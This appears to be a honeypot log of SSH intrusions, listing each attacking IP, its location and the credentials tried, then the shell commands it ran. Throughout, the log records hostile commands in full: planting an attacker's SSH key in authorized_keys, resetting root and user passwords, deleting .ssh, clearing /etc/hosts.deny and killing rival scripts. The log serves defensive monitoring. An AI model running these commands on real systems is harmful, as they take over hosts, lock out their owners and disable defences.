$ echo -e "123\nbcIsfks4tjb6\nbcIsfks4tjb6"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nbcIsfks4tjb6\nbcIsfks4tjb6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_43 (103.20.122.54) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-06-01 02:14 EDT Β· as root/P@ssw0Rd
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:iQRbssn6Y8sU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_16 (180.76.177.88) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-06-01 02:10 EDT Β· as root/Dd123456
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:NE4DXkrlc4vE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_10 (101.34.86.19) β€” Shanghai, China Β· 1 session Β· 20 cmds
2026-06-01 02:09 EDT Β· as ansadmin/ansadmin
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ansadmin\nJUNEo6wS1FAs\nJUNEo6wS1FAs"|passwd|bash
$ Enter new UNIX password:
$ echo "ansadmin\nJUNEo6wS1FAs\nJUNEo6wS1FAs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 acai_root_2 (34.95.197.36) β€” Sao Paulo, Brazil Β· 1 session Β· 20 cmds
2026-06-01 00:58 EDT Β· as test/qwe123
Ran uname 6x across 6 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "qwe123\nQW3WnMUu88uF\nQW3WnMUu88uF"|passwd|bash
$ Enter new UNIX password:
$ echo "qwe123\nQW3WnMUu88uF\nQW3WnMUu88uF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 clog_sol_2 (176.65.132.119) β€” Eygelshoven, The Netherlands Β· 2 sessions Β· 2 cmds
2026-05-31 23:16 EDT Β· as admin/admin, deployer/dev
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 eagle_root_21 (209.99.185.195) β€” San Francisco, United States Β· 3 sessions Β· 24 cmds
2026-05-31 20:12 EDT Β· as anna/password, develop/123456, root/aA111222
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password\nLdNGPFpCk36Q\nLdNGPFpCk36Q"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nLdNGPFpCk36Q\nLdNGPFpCk36Q\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_38 (94.183.235.102) β€” Helsinki, Finland Β· 7 sessions Β· 50 cmds
2026-05-26 19:30 EDT Β· as anna/password, develop/123456, devops/devops@2025
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—7 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—7 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544AA@@\nO1WxsKAXeKNh\nO1WxsKAXeKNh"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544AA@@\nO1WxsKAXeKNh\nO1WxsKAXeKNh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "devops@2025\na1pPW7Ya9Daz\na1pPW7Ya9Daz"|passwd|bash
$ echo "devops@2025\na1pPW7Ya9Daz\na1pPW7Ya9Daz\n"|passwd
🎭 bistro_root_3 (51.77.158.34) β€” Roubaix, France Β· 5 sessions Β· 10 cmds
2026-05-31 20:12 EDT Β· as anna/password, develop/123456, root/123456Yy
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 5x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 pretzel_root_10 (178.104.233.190) β€” Nuremberg, Germany Β· 5 sessions Β· 10 cmds
2026-05-31 20:12 EDT Β· as anna/password, develop/123456, dmdba/123456
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 5x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 bistro_root_4 (87.106.26.63) β€” Courbevoie, France Β· 5 sessions Β· 10 cmds
2026-05-31 20:11 EDT Β· as anna/password, develop/123456, root/123456Yy
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 5x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 strudel_root_4 (4.182.219.135) β€” Frankfurt am Main, Germany Β· 9 sessions Β· 69 cmds
2026-05-17 18:20 EDT Β· as anna/password, aroot/aroot, develop/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—9 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—9 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:yJirJP4oe56O"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:DqzDleZeXxqk"|chpasswd|bash
$ echo "root:4UDG4mCABGgh"|chpasswd|bash
🎭 pretzel_root_11 (164.90.190.108) β€” Frankfurt am Main, Germany Β· 5 sessions Β· 10 cmds
2026-05-31 20:11 EDT Β· as anna/password, develop/123456, root/Jkl123456
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 5x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 eagle_root_22 (209.99.184.143) β€” San Francisco, United States Β· 4 sessions Β· 8 cmds
2026-05-31 20:16 EDT Β· as anna/password, develop/123456, root/123456Yy
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 4x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
🎭 pretzel_root_5 (46.101.216.224) β€” Frankfurt am Main, Germany Β· 7 sessions Β· 50 cmds
2026-05-08 08:28 EDT Β· as anna/password, dmdba/123456, postgres/newpassword
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—7 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—7 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "simon\n3DWohYUmeBs5\n3DWohYUmeBs5"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "simon\n3DWohYUmeBs5\n3DWohYUmeBs5\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "newpassword\ny4NyXM6vst4K\ny4NyXM6vst4K"|passwd|bash
$ echo "newpassword\ny4NyXM6vst4K\ny4NyXM6vst4K\n"|passwd
🎭 scone_root (37.143.61.84) β€” City of London, United Kingdom Β· 9 sessions Β· 87 cmds
2026-05-19 09:53 EDT Β· as anna/password, aroot/aroot, claude/Claude2026!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—9 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—9 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:QRNaca4avKua"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:KYW3z5jlHhlh"|chpasswd|bash
$ echo -e "Claude2026!\nWU4UY6q0Od2Y\nWU4UY6q0Od2Y"|passwd|bash
$ Enter new UNIX password:
$ echo "Claude2026!\nWU4UY6q0Od2Y\nWU4UY6q0Od2Y\n"|passwd
$ echo "root:HviydVE1Eylh"|chpasswd|bash
🎭 ghost_root_53 (138.226.237.238) β€” Belize City, Belize Β· 5 sessions Β· 10 cmds
2026-05-31 20:12 EDT Β· as anna/password, root/123456Yy, root/Jkl123456
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 5x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
🎭 rogue_root_16 (34.78.29.97) β€” Brussels, Belgium Β· 4 sessions Β· 25 cmds
2026-05-24 06:06 EDT Β· as anna/password, root/123456Yy, root/2wsx@WSX
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:oC7XbVdyFwrd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
